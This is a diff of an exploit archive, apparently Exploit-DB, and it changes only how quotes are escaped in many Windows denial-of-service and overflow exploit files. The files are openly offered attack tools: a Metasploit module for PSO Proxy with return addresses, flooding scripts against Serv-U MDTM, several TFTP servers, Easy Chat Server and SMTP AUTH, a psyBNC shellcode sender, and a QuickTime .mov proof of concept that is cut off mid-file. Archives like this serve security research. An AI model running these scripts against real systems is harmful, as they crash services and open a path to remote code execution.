', + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 9262 $', + 'References' => [ - [ \'CVE\', \'2004-0313\' ], - [ \'OSVDB\', \'4028\' ], - [ \'URL\', \'http://www.milw0rm.com/exploits/156\' ], - [ \'BID\', \'9706\' ], + [ 'CVE', '2004-0313' ], + [ 'OSVDB', '4028' ], + [ 'URL', 'http://www.milw0rm.com/exploits/156' ], + [ 'BID', '9706' ], ], - \'DefaultOptions\' => + 'DefaultOptions' => { - \'EXITFUNC\' => \'thread\', + 'EXITFUNC' => 'thread', }, - \'Payload\' => + 'Payload' => { - \'Space\' => 370, - \'BadChars\' => \"\\x00\\x0a\\x0d\\x20\", - \'StackAdjustment\' => -3500, + 'Space' => 370, + 'BadChars' => "\x00\x0a\x0d\x20", + 'StackAdjustment' => -3500, }, - \'Platform\' => \'win\', - \'Targets\' => + 'Platform' => 'win', + 'Targets' => [ # Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en. - [ \'Windows 2000 Pro SP0-4 English\', { \'Ret\' => 0x75023112 } ], # call ecx ws2help.dll - [ \'Windows 2000 Pro SP0-4 French\', { \'Ret\' => 0x74fa3112 } ], # call ecx ws2help.dll - [ \'Windows 2000 Pro SP0-4 Italian\', { \'Ret\' => 0x74fd3112 } ], # call ecx ws2help.dll - [ \'Windows XP Pro SP0/1 English\', { \'Ret\' => 0x71aa396d } ], # call ecx ws2help.dll - [ \'Windows XP Pro SP2 English\', { \'Ret\' => 0x71aa3de3 } ], # call ecx ws2help.dll + [ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll + [ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll + [ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll + [ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll + [ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll ], - \'Privileged\' => false, - \'DisclosureDate\' => \'Feb 20 2004\' + 'Privileged' => false, + 'DisclosureDate' => 'Feb 20 2004' )) register_options( @@ -65,9 +65,9 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\") + sock.put("GET / HTTP/1.0\r\n\r\n") banner = sock.get(-1,3) - if (banner =~ /PSO Proxy 0\\.9/) + if (banner =~ /PSO Proxy 0\.9/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe @@ -77,9 +77,9 @@ class Metasploit3 < Msf::Exploit::Remote connect exploit = rand_text_alphanumeric(1024, payload_badchars) - exploit += [target[\'Ret\']].pack(\'V\') + payload.encoded + exploit += [target['Ret']].pack('V') + payload.encoded - sock.put(exploit + \"\\r\\n\\r\\n\") + sock.put(exploit + "\r\n\r\n") disconnect handler diff --git a/platforms/windows/dos/23760.pl b/platforms/windows/dos/23760.pl index c5f0e2813..d8896723b 100755 --- a/platforms/windows/dos/23760.pl +++ b/platforms/windows/dos/23760.pl @@ -11,25 +11,25 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m ## I do not take responsibility for the use of this code use IO::Socket qw(:DEFAULT :crlf); -print \"Serv-u MDTM Buffer overflow - by saintjmf\\n\"; +print "Serv-u MDTM Buffer overflow - by saintjmf\n"; ## Get Host port unsername and password -my $host = shift || die print \"\\nUsage: \\n\"; -my $port = shift || die print \"\\nUsage: \\n\"; +my $host = shift || die print "\nUsage: \n"; +my $port = shift || die print "\nUsage: \n"; -$username = shift || die print \"\\nUsage: \\n\"; -$password = shift || die print \"\\nUsage: \\n\"; +$username = shift || die print "\nUsage: \n"; +$password = shift || die print "\nUsage: \n"; ## Create Socket -my $socket = IO::Socket::INET->new(\"$host:$port\") or die print \"\\nUnable to connect -- $!\\n\"; +my $socket = IO::Socket::INET->new("$host:$port") or die print "\nUnable to connect -- $!\n"; -print \"connecting...............\\n\\n\"; +print "connecting...............\n\n"; connecter($socket); -print \"Server should be stopped\\n\"; +print "Server should be stopped\n"; ## Sub that sends username, password and exploit @@ -39,20 +39,20 @@ sub connecter{ my $socket2 = shift; my $message2 = <$socket2>; chomp $message2; - print \"$message2\\n\"; + print "$message2\n"; sleep(5); - print $socket2 \"user $username\",CRLF; + print $socket2 "user $username",CRLF; $message2 = <$socket2>; chomp $message2; - print \"$message2\\n\"; + print "$message2\n"; sleep (5); - print $socket2 \"pass $password\", CRLF; + print $socket2 "pass $password", CRLF; $message2 = <$socket2>; chomp $message2; - print \"$message2\\n\"; + print "$message2\n"; sleep (4); - print \"Sending MDTM Overflow.....\\n\"; - print $socket2 \"MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt\" ,CRLF; + print "Sending MDTM Overflow.....\n"; + print $socket2 "MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt" ,CRLF; } diff --git a/platforms/windows/dos/23761.c b/platforms/windows/dos/23761.c index 660190eab..08c570c63 100755 --- a/platforms/windows/dos/23761.c +++ b/platforms/windows/dos/23761.c @@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user. -/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow PoC DoS exploit. +/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow PoC DoS exploit. * * This program will send an overly large filename parameter when calling * the Serv-U FTP MDTM command. Although arbitrary code execution is @@ -34,9 +34,9 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m int main(int argc, char *argv[]) { if(argc < 5) { - printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\"); - printf(\"by shaun2k2 - .\\n\\n\"); - printf(\"Usage: %s \\n\", argv[0]); + printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n"); + printf("by shaun2k2 - .\n\n"); + printf("Usage: %s \n", argv[0]); exit(-1); } @@ -50,13 +50,13 @@ int main(int argc, char *argv[]) { /* lookup IP address of supplied hostname. */ if((he = gethostbyname(argv[1])) == NULL) { - printf(\"Couldn\'t resolve %s!\\n\", argv[1]); + printf("Couldn't resolve %s!\n", argv[1]); exit(-1); } /* create socket. */ if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { - perror(\"socket()\"); + perror("socket()"); exit(-1); } @@ -65,26 +65,26 @@ int main(int argc, char *argv[]) { dest.sin_port = htons(atoi(argv[2])); dest.sin_addr = *((struct in_addr *)he->h_addr); - printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\"); - printf(\"by shaun2k2 - .\\n\\n\"); + printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n"); + printf("by shaun2k2 - .\n\n"); - printf(\"Crafting exploit buffer...\\n\\n\"); + printf("Crafting exploit buffer...\n\n"); /* craft exploit buffers. */ - memset(bigbuf, \'a\', 6000); - sprintf(loginbuf, \"USER %s\\n\", argv[3]); - sprintf(passwdbuf, \"PASS %s\\n\", argv[4]); - sprintf(explbuf, \"MDTM 20031111111111+%s\\r\\n\", bigbuf); + memset(bigbuf, 'a', 6000); + sprintf(loginbuf, "USER %s\n", argv[3]); + sprintf(passwdbuf, "PASS %s\n", argv[4]); + sprintf(explbuf, "MDTM 20031111111111+%s\r\n", bigbuf); - printf(\"[+] Connecting...\\n\"); + printf("[+] Connecting...\n"); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) < 0) { - perror(\"connect()\"); + perror("connect()"); exit(-1); } - printf(\"[+] Connected!\\n\\n\"); + printf("[+] Connected!\n\n"); - printf(\"[+] Sending exploit buffers...\\n\"); + printf("[+] Sending exploit buffers...\n"); sleep(1); /* give the serv-u server time to sort itself out. */ send(sock, loginbuf, strlen(loginbuf), 0); sleep(2); /* wait for 2 secs. */ @@ -92,11 +92,11 @@ int main(int argc, char *argv[]) { sleep(2); /* wait before sending large MDTM command. */ send(sock, explbuf, strlen(explbuf), 0); sleep(1); /* wait before closing the socket. */ - printf(\"[+] Exploit buffer sent!\\n\\n\"); + printf("[+] Exploit buffer sent!\n\n"); close(sock); - printf(\"[+] Done! Check if the Serv-U server has crashed.\\n\"); + printf("[+] Done! Check if the Serv-U server has crashed.\n"); return(0); } diff --git a/platforms/windows/dos/23762.c b/platforms/windows/dos/23762.c index df57b218c..a3fe00ce4 100755 --- a/platforms/windows/dos/23762.c +++ b/platforms/windows/dos/23762.c @@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user. -/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow +/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow PoC DoS exploit. * * This program will send an overly large filename @@ -45,12 +45,12 @@ login and password. int main(int argc, char *argv[]) { if(argc < 5) { - printf(\"Serv-U \'MDTM\' buffer overflow -DoS exploit.\\n\"); - printf(\"by shaun2k2 - -.\\n\\n\"); - printf(\"Usage: %s - \\n\", argv[0]); + printf("Serv-U 'MDTM' buffer overflow +DoS exploit.\n"); + printf("by shaun2k2 - +.\n\n"); + printf("Usage: %s + \n", argv[0]); exit(-1); } @@ -63,7 +63,7 @@ DoS exploit.\\n\"); /* lookup IP address of supplied hostname. */ if((he = gethostbyname(argv[1])) == NULL) { - printf(\"Couldn\'t resolve %s!\\n\", + printf("Couldn't resolve %s!\n", argv[1]); exit(-1); } @@ -71,7 +71,7 @@ argv[1]); /* create socket. */ if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { - perror(\"socket()\"); + perror("socket()"); exit(-1); } @@ -81,29 +81,29 @@ argv[1]); dest.sin_addr = *((struct in_addr *)he->h_addr); - printf(\"Serv-U \'MDTM\' buffer overflow DoS -exploit.\\n\"); - printf(\"by shaun2k2 - -.\\n\\n\"); + printf("Serv-U 'MDTM' buffer overflow DoS +exploit.\n"); + printf("by shaun2k2 - +.\n\n"); - printf(\"Crafting exploit buffer...\\n\\n\"); + printf("Crafting exploit buffer...\n\n"); /* craft exploit buffers. */ - sprintf(loginbuf, \"USER %s\\n\", argv[3]); - sprintf(passwdbuf, \"PASS %s\\n\", argv[4]); - explbuf = \"MDTM -20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt\"; + sprintf(loginbuf, "USER %s\n", argv[3]); + sprintf(passwdbuf, "PASS %s\n", argv[4]); + explbuf = "MDTM +20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt"; - printf(\"[+] Connecting...\\n\"); + printf("[+] Connecting...\n"); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) < 0) { - perror(\"connect()\"); + perror("connect()"); exit(-1); } - printf(\"[+] Connected!\\n\\n\"); + printf("[+] Connected!\n\n"); - printf(\"[+] Sending exploit buffers...\\n\"); + printf("[+] Sending exploit buffers...\n"); sleep(1); /* give the serv-u server time to sort itself out. */ send(sock, loginbuf, strlen(loginbuf), 0); @@ -114,12 +114,12 @@ command. */ send(sock, explbuf, strlen(explbuf), 0); sleep(1); /* wait before closing the socket. */ - printf(\"[+] Exploit buffer sent!\\n\\n\"); + printf("[+] Exploit buffer sent!\n\n"); close(sock); - printf(\"[+] Done! Check if the Serv-U server -has crashed.\\n\"); + printf("[+] Done! Check if the Serv-U server +has crashed.\n"); return(0); } diff --git a/platforms/windows/dos/24952.py b/platforms/windows/dos/24952.py index a1eb18017..0f773665d 100755 --- a/platforms/windows/dos/24952.py +++ b/platforms/windows/dos/24952.py @@ -17,31 +17,31 @@ #!/usr/bin/python import socket import sys -host = \\\'192.168.1.32\\\' +host = '192.168.1.32' port = 69 -nseh=\\\"\\\\xCC\\\\xCC\\\\xCC\\\\xCC\\\" +nseh="\xCC\xCC\xCC\xCC" #seh handler overwritten at 261 byte of shellcode but to exception triggered to use it. -seh=\\\"\\\\x18\\\\x0B\\\\x27\\\" # Breakpoint in no SafeSEH space in Windows XP SP3 +seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3 -payload=\\\"\\\\xCC\\\"*257 + nseh + seh + \\\"\\\\x00\\\" + \\\"3137\\\" + \\\"\\\\x00\\\" +payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00" #payload to get access violation: -#payload=(\\\"\\\\x00\\\\x01\\\\x25\\\\x32\\\\x35\\\\x25\\\" -#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" -#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" -#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" -#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" -#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" -#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" -#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x35\\\" -#\\\"\\\\x63\\\\x65\\\\x74\\\\x63\\\\x25\\\\x32\\\\x35\\\\x35\\\\x63\\\\x68\\\\x6f\\\\x73\\\\x74\\\\x73\\\\x00\\\\x6e\\\" -#\\\"\\\\x00\\\") +#payload=("\x00\x01\x25\x32\x35\x25" +#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" +#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" +#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" +#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" +#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" +#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" +#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x35" +#"\x63\x65\x74\x63\x25\x32\x35\x35\x63\x68\x6f\x73\x74\x73\x00\x6e" +#"\x00") -buffer=\\\"\\\\x00\\\\x01\\\"+ payload + \\\"\\\\x06\\\" + \\\"netascii\\\" + \\\"\\\\x00\\\" +buffer="\x00\x01"+ payload + "\x06" + "netascii" + "\x00" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) diff --git a/platforms/windows/dos/26010.py b/platforms/windows/dos/26010.py index 6d28545cd..0f4adc188 100755 --- a/platforms/windows/dos/26010.py +++ b/platforms/windows/dos/26010.py @@ -14,12 +14,12 @@ from socket import * import sys import select -pwn = \"\\x00\\x02\" -pwn += \"\\x66\\x69\\x6c\\x65\\x2e\\x74\\x78\\x74\\x00\" -pwn += \"A\"*1200 -pwn += \"\\x00\" +pwn = "\x00\x02" +pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00" +pwn += "A"*1200 +pwn += "\x00" -address = (\'192.168.200.20\', 69) +address = ('192.168.200.20', 69) server_socket = socket(AF_INET, SOCK_DGRAM) server_socket.sendto(pwn, address) diff --git a/platforms/windows/dos/2855.py b/platforms/windows/dos/2855.py index 54179bc34..85a4a4e18 100755 --- a/platforms/windows/dos/2855.py +++ b/platforms/windows/dos/2855.py @@ -17,7 +17,7 @@ # A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers # to execute arbitrary commands or cause a denial of service. This flaw is # due to a buffer overflow error when handling an overly long transporting -# mode (more than 470 bytes) passed to a \"GET\" or \"PUT\" command, which could +# mode (more than 470 bytes) passed to a "GET" or "PUT" command, which could # be exploited by malicious users to compromise a vulnerable system or crash # an affected application. @@ -26,18 +26,18 @@ import socket import sys -host = \'192.168.1.11\' +host = '192.168.1.11' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: - print \"socket() failed\" + print "socket() failed" sys.exit(1) -filename = \"A\" -mode = \"netascii\" + \"A\" * 469 -da = \"\\x00\\x02\" + filename + \"\\0\" + mode + \"\\0\" +filename = "A" +mode = "netascii" + "A" * 469 +da = "\x00\x02" + filename + "\0" + mode + "\0" s.sendto(da, (host, port)) # milw0rm.com [2006-11-27] diff --git a/platforms/windows/dos/29285.txt b/platforms/windows/dos/29285.txt index 05d281a8d..5eccf930b 100755 --- a/platforms/windows/dos/29285.txt +++ b/platforms/windows/dos/29285.txt @@ -2,7 +2,7 @@ source: http://www.securityfocus.com/bid/21612/info Multiple applications are prone to a denial-of-service vulnerability. -A remote attacker may exploit this vulnerability by presenting malicious \'WMV\', \'MID\', and \'AVI\' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service. +A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service. It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available. diff --git a/platforms/windows/dos/29721.pl b/platforms/windows/dos/29721.pl index b8b18973f..e6094f24e 100755 --- a/platforms/windows/dos/29721.pl +++ b/platforms/windows/dos/29721.pl @@ -14,20 +14,20 @@ An attacker can exploit these issues to execute arbitrary code within the contex use Socket; -$retPtr = \"\\x60\\xef\\xff\\xbf\"; +$retPtr = "\x60\xef\xff\xbf"; # Pirated from some guy called gunslinger_ -$exit1code = \"\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\"; +$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80"; -$code = \"\\x90\" x 120 . $exit1code . $retPtr; +$code = "\x90" x 120 . $exit1code . $retPtr; -socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\"tcp\")) or die \"Couldn\'t open socket\"; -bind(SOCKET, sockaddr_in(6667, inet_aton(\"127.0.0.1\"))) or die \"Couldn\'t bind to port 6667\"; -listen(SOCKET,5) or die \"Couldn\'t listen on port\"; +socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket"; +bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667"; +listen(SOCKET,5) or die "Couldn't listen on port"; while(accept(CLIENT,SOCKET)){ sleep 1; select((select(CLIENT), $|=1)[0]); - print CLIENT \":-psyBNC!~cjd\\@ef.net PRIVMSG luser : :($code\\r\\n\"; + print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n"; } close(SOCKET); diff --git a/platforms/windows/dos/3127.c b/platforms/windows/dos/3127.c index 43c7b39c0..309f3dfd6 100755 --- a/platforms/windows/dos/3127.c +++ b/platforms/windows/dos/3127.c @@ -11,10 +11,10 @@ *Coded by Marsu * ************************************************************************/ -#include \"winsock2.h\" -#include \"stdio.h\" -#include \"stdlib.h\" -#pragma comment(lib, \"ws2_32.lib\") +#include "winsock2.h" +#include "stdio.h" +#include "stdlib.h" +#pragma comment(lib, "ws2_32.lib") int main(int argc, char* argv[]) { @@ -28,58 +28,58 @@ int main(int argc, char* argv[]) if (argc!=3) { - printf(\"[+] Usage: %s \\n\",argv[0]); + printf("[+] Usage: %s \n",argv[0]); return 1; } WSACleanup(); WSAStartup(MAKEWORD(2,0),&wsa); - printf(\"[+] Connecting to %s:%s ... \",argv[1],argv[2]); + printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]); if ((he=gethostbyname(argv[1])) == NULL) { - printf(\"Failed\\n[-] Could not init gethostbyname\\n\"); + printf("Failed\n[-] Could not init gethostbyname\n"); return 1; } if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { - printf(\"Failed\\n[-] Socket error\\n\"); + printf("Failed\n[-] Socket error\n"); return 1; } sock_addr.sin_family = PF_INET; sock_addr.sin_port = htons(atoi(argv[2])); sock_addr.sin_addr = *((struct in_addr *)he->h_addr); - memset(&(sock_addr.sin_zero), \'\\0\', 8); + memset(&(sock_addr.sin_zero), '\0', 8); if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) { - printf(\"Failed\\n[-] Sorry, cannot connect to %s:%s. Error: %i\\n\", argv[1],argv[2],WSAGetLastError()); + printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError()); return 1; } - printf(\"OK\\n\"); - memset(recvbuff,\'\\0\',1024); + printf("OK\n"); + memset(recvbuff,'\0',1024); recv(ftpsock, recvbuff, 1024, 0); - printf(\"[+] Building payload ... \"); - memset(evilbuff,\'A\',buflen); - memset(evilbuff+585,\'B\',4); //eax and edx will be 42424262 - memcpy(evilbuff,\"USER \",5); - memcpy(evilbuff+buflen,\"\\r\\n\\0\",3); - printf(\"OK\\n[+] Sending USER ... \"); + printf("[+] Building payload ... "); + memset(evilbuff,'A',buflen); + memset(evilbuff+585,'B',4); //eax and edx will be 42424262 + memcpy(evilbuff,"USER ",5); + memcpy(evilbuff+buflen,"\r\n\0",3); + printf("OK\n[+] Sending USER ... "); if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) { - printf(\"Failed\\n[-] Could not send\\n\"); + printf("Failed\n[-] Could not send\n"); return 1; } - printf(\"OK\\n\"); - memset(recvbuff,\'\\0\',1024); + printf("OK\n"); + memset(recvbuff,'\0',1024); recv(ftpsock, recvbuff, 1024, 0); - memcpy(evilbuff,\"PASS \",5); - printf(\"[+] Sending PASS ... \"); + memcpy(evilbuff,"PASS ",5); + printf("[+] Sending PASS ... "); if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) { - printf(\"Failed\\n[-] Could not send\\n\"); + printf("Failed\n[-] Could not send\n"); return 1; } - printf(\"OK\\n\"); + printf("OK\n"); recv(ftpsock, recvbuff, 1024, 0); - printf(\"[+] Host should be down\\n\"); + printf("[+] Host should be down\n"); return 0; } diff --git a/platforms/windows/dos/3432.pl b/platforms/windows/dos/3432.pl index 1ff82ea78..d954d8789 100755 --- a/platforms/windows/dos/3432.pl +++ b/platforms/windows/dos/3432.pl @@ -20,16 +20,16 @@ use IO::Socket; use strict; -my($socket) = \"\"; +my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], -PeerPort => \"69\", +PeerPort => "69", -Proto => \"UDP\")) +Proto => "UDP")) { - print $socket \"A\" x 517; + print $socket "A" x 517; sleep(1); @@ -37,7 +37,7 @@ Proto => \"UDP\")) } else { - print \"Cannot connect to $ARGV[0]:69\\n\"; + print "Cannot connect to $ARGV[0]:69\n"; } # milw0rm.com [2007-03-08] diff --git a/platforms/windows/dos/3866.html b/platforms/windows/dos/3866.html index 8355ebc4d..f7eddca93 100755 --- a/platforms/windows/dos/3866.html +++ b/platforms/windows/dos/3866.html @@ -1,7 +1,7 @@ -

2007/05/07

 +

2007/05/07

 
--------------------------------------------------------------------------------------
- Versalsoft HTTP File Uploader (UFileUploaderD.dll) \'AddFile\' method Buffer Overflow
+-------------------------------------------------------------------------------------
+ Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow
  url: http://en.versalsoft.com/
  price: from $59.95 to $799.95
 
@@ -13,25 +13,25 @@
  Try only 1500 characters (or less) to see IE crash.
 -------------------------------------------------------------------------------------
 
-
+
 
- 
+ 
 
-As you can see by the faultmon dump, EIP is overwrite so code execution should
+As you can see by the faultmon dump, EIP is overwrite so code execution should
 be possible... but I leave to posterity the hardest part of work :)
 
 11:40:51.172  pid=08E4 tid=0AB0  EXCEPTION (first-chance)
diff --git a/platforms/windows/dos/4289.php b/platforms/windows/dos/4289.php
index 365fa1c9e..68aa5c234 100755
--- a/platforms/windows/dos/4289.php
+++ b/platforms/windows/dos/4289.php
@@ -24,18 +24,18 @@ length for Name & Password. If attacker inserts a long Name &
 Password by editing or make his own login page, chat server
 will crash.
 */
-echo \"Easy Chat Server Remote DoS Exploit\\n\\t\\t\\t\\tby NetJackal\";
-if($argc<2)die(\"\\nUsage:   php dos.php [TARGET] [PORT]\\nExample: php dos.php localhost 80\\n\");
+echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
+if($argc<2)die("\nUsage:   php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
 $host=$argv[1];
 $port=$argv[2];
-$A=str_repeat(\'A\',999);
-echo \"\\nConnecting...\";
+$A=str_repeat('A',999);
+echo "\nConnecting...";
 $link=fsockopen($host,$port,$en,$es,30);
-if(!$link)die(\"\\n$en: $es\");
-echo \"\\nConnected!\";
-echo \"\\nSending exploit...\";
-fputs($link,\"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\\r\\nHost: $host\\r\\n\\r\\n\");
-echo \"\\nWell done!\\n\";
+if(!$link)die("\n$en: $es");
+echo "\nConnected!";
+echo "\nSending exploit...";
+fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
+echo "\nWell done!\n";
 ?>
 
 # milw0rm.com [2007-08-14]
diff --git a/platforms/windows/dos/4294.pl b/platforms/windows/dos/4294.pl
index 0c63bc28a..4c6ac80b0 100755
--- a/platforms/windows/dos/4294.pl
+++ b/platforms/windows/dos/4294.pl
@@ -14,14 +14,14 @@
 use IO::Socket;
 use MIME::Base64;
 $|=1;
-$host = \"localhost\";
-$a = \"QUFB\" x 10000;
-my $sock = IO::Socket::INET->new(PeerAddr => \"$host\",
-PeerPort => \'25\',
-Proto => \'tcp\');
-print $sock \"EHLO you\\r\\n\";
-print $sock \"AUTH CRAM-MD5\\r\\n\";
-print $sock $a . \"\\r\\n\";
+$host = "localhost";
+$a = "QUFB" x 10000;
+my $sock = IO::Socket::INET->new(PeerAddr => "$host",
+PeerPort => '25',
+Proto => 'tcp');
+print $sock "EHLO you\r\n";
+print $sock "AUTH CRAM-MD5\r\n";
+print $sock $a . "\r\n";
 while(<$sock>) {
 print;
 }
diff --git a/platforms/windows/dos/7296.txt b/platforms/windows/dos/7296.txt
index c1c1d6771..7c5f778a8 100755
--- a/platforms/windows/dos/7296.txt
+++ b/platforms/windows/dos/7296.txt
@@ -28,9 +28,9 @@ Tested agains: Itunes 8.0.2.20/Quicktime 7.5.5 on XP SP3 fully patched
 
 ================
 
-\"Many of today\'s leading authoring, multimedia and entertainment applications rely on QuickTime to do the heavy lifting.
+"Many of today's leading authoring, multimedia and entertainment applications rely on QuickTime to do the heavy lifting.
 QuickTime contains a rich set of developer APIs for handling almost any audio, video and media task.
-Easily make your application multimedia-enabled with QuickTime.\"
+Easily make your application multimedia-enabled with QuickTime."
 
 =======
 
@@ -41,13 +41,13 @@ Quicktime & itunes fails to handle long arguments on a .mov file.
 Quicktime is compiled with the /GS cookie on , so the bug get handled with an exit code :
 c0000409
 but ...
-Itunes doesn\'t seems to be compiled with the /GS flag, so we get some code execution possible via Itunes.
-The PoC give\'s us full control over EAX & EDI
+Itunes doesn't seems to be compiled with the /GS flag, so we get some code execution possible via Itunes.
+The PoC give's us full control over EAX & EDI
 Itunes call unsafely the Quicktime function to play the .mov, so we can trigger a possible code execution
 via this unsafe call to quicktime héhéhé :)
 The only problem, is the lengh of the buffer overflowed :(
 erf ... 49 bytes, less the 8 bytes controlling the EDI & EAX registers so 41.
-i\'ve tryed to find a way to fill some buffer in the .mov to get some code exec working on this poc,
+i've tryed to find a way to fill some buffer in the .mov to get some code exec working on this poc,
 but out of luck, i guess someone will maybe be able to do some magic tricks :)
 
 
@@ -62,19 +62,19 @@ but out of luck, i guess someone will maybe be able to do some magic tricks :)
 use strict;
 
 my $movfile =
-\"\\x00\\x00\\x00\\x7d\\x6d\\x6f\\x6f\\x76\\x00\\x00\\x00\\x75\\x72\\x6d\\x72\\x61\\x00\\x00\\x00\\x6d\".
-\"\\x72\\x6d\\x64\\x61\\x00\\x00\\x00\\x55\\x72\\x64\\x72\\x66\\x00\\x00\\x00\\x00\\x75\\x72\\x6c\\x20\".
-\"\\x00\\x00\\x00\\x41\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x32\\x37\\x2e\\x30\\x2e\\x30\\x2e\\x31\".
-\"\\x2f\\x74\\x65\\x73\\x74\\x2e\\x6d\\x6f\\x76\\x00\\x00\\x00\\x00\\x10\\x72\\x6d\\x64\\x72\\x00\\x00\".
-\"\\x00\\x00\\x00\\x00\\x05\\x78\".
-\"\\x41\\x42\\x43\\x44\". #EDI here
